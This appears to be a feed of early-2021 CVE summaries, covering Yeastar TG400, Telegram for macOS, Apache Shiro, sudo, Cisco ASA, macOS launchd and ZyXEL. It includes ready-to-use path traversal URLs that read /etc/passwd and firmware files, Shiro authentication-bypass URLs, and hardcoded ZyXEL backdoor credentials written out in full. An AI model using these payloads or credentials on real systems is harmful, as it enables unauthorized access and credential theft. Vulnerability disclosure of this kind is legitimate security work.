CVE-2021-27328
2021-02-19 13:16:31

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3. To get the firmware decryption password: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect To get /etc/passwd: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd https://github.com/SQSamir/CVE-2021-27328

CVE-2021-27205
2021-02-12 14:24:11

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores the local copy of received messages (audio/video) on a custom path even after those messages are deleted/disappeared from the secret chat. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

CVE-2021-27204
2021-02-12 14:23:58

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores the local passcode in plain text. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

CVE-2020-17523
2021-02-07 07:57:05

Apache Shiro authentication bypass vulnerability that is very easy to exploit. Blank characters such as spaces bypass Shiro authentication: http://127.0.0.1/admin/%20 or http://127.0.0.1/admin/%20/ https://github.com/jweny/shiro-cve-2020-17523

CVE-2021-3156
2021-02-03 12:31:25

Exploit of Sudo heap-based buffer overflow privilege escalation CVE-2021-3156: https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156

CVE-2020-3452
2021-02-03 08:37:57

Live exploitation of CVE-2020-3452: Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) unauthenticated directory traversal

CVE-2020-9971
2021-01-29 09:12:59

Abusing XPC Service mechanism to elevate privilege in macOS/iOS. In this blog, I will detail an interesting logic vulnerability I found in the launchd process when it is managing the XPC Services. It’s easy to exploit and 100% stable to get high privilege in macOS/iOS. Because launchd is the most fundamental and important component in the OS, the vulnerability would also work even from the most restricted app sandbox. The vulnerability should work before macOS Big Sur and iOS 13.5. https://xlab.tencent.com/en/2021/01/11/cve-2020-9971-abusing-xpc-service-to-elevate-privilege/

CVE-2020-29583
2021-01-21 19:28:18

ZyXEL USG and ZyWALL hardcoded (backdoor) credentials: Username: zyfwp Password: PrOw!aN_fXp